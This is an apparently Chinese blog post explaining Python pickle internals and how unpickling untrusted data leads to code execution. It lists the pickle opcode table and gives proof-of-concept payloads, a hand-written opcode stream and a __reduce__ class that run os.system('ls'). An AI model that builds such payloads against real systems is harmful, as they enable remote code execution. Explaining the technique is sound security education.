Pickle 相关

总结一些Pickle安全相关的东西。

背景

1
Warning: the pickle module is not intended to be secure angainst erroneous or malicuously constructed data. Never unpickle data received from an untrusted or unauthenticated souorce.

在不同的进程或机器中,函数A向函数B传递一个对象有几种方式:选择一个自定义的协议,实现一个公开的协议或者依赖于自身的框架生成字节流。显然最后一种方式是最简单的,也就是序列化和反序列化。

关键函数:dumps()loads()

默认序列化过程:

  • 获取类的实例
  • 从这个对象提取它的所有属性__dict__
  • 把一系列属性转化为键值对
  • 写入类名
  • 写入键值对

反序列化过程:

  • 获取 pickle 流
  • 重建属性列表
  • 利用存储的类名创建对象
  • 把属性复制进新创建的对象

Pickle 依赖于一个微型的虚拟机,pickle 流实际上就是一个程序,其中指令和数据是交错的。

Pickle virtual machine(PVM) 需要的资源:处理器、栈和存储。

处理器:从0字节处开始读取操作码和参数,处理它们,改变栈和内存,重复以上步骤直到pickle流结束。返回栈顶,作为反序列化的对昂。

存储:基本上是寄存器,实现为Python dict,为PVM提供存储。

栈:临时存储数据、参数和对象,实现为 Python list,

PVM指令:操作码占1字节,参数用新行标识(有些指令不接受参数,有些接受多个参数)。

指令集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
MARK           = b'('   # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py

生成

手写

基本模式:

1
2
3
4
c<module>
<callable>
(<args>
tR

例子:

1
2
3
4
cos		# import os
system # 添加 system() 到 stack
(S'ls' # 把当前 stack 存到 metastack(保存os.system),清栈,压入 ls
tR. # t-弹出 stack 的内容,转换为 tuple,压入metastack,压入tuple,R-system(('ls',)),.-结束,返回栈顶元素(system('ls'))

用reduce生成

1
2
3
4
5
6
import os, pickle
class Test(object):
def __reduce__(self):
return (os.system,('ls',))
pickle.dumps(Test(),protocol=0)
# b'cnt\nsystem\np0\n(Vls\np1\ntp2\nRp3\n.'

缺点为只能执行单一函数,很难构造复杂操作。

利用AST自动化构造

Github repo

可以做到:

  • 变量赋值:存到memo,保存memo下标和变量名
  • 函数调用
  • 使用字面量
  • list 和 dict 成员修改
  • 对象成员变量修改

支持的单行表达式:

  • 变量赋值 - 左值可以是变量名、dict或list成员、对象成员;右值可以是基础类型的字面量、函数调用
  • 函数调用
  • return - 可返回0或1个参数

参考:PPT安全客博客先知社区

作者

lll

发布于

2020-03-10

更新于

2022-09-19

许可协议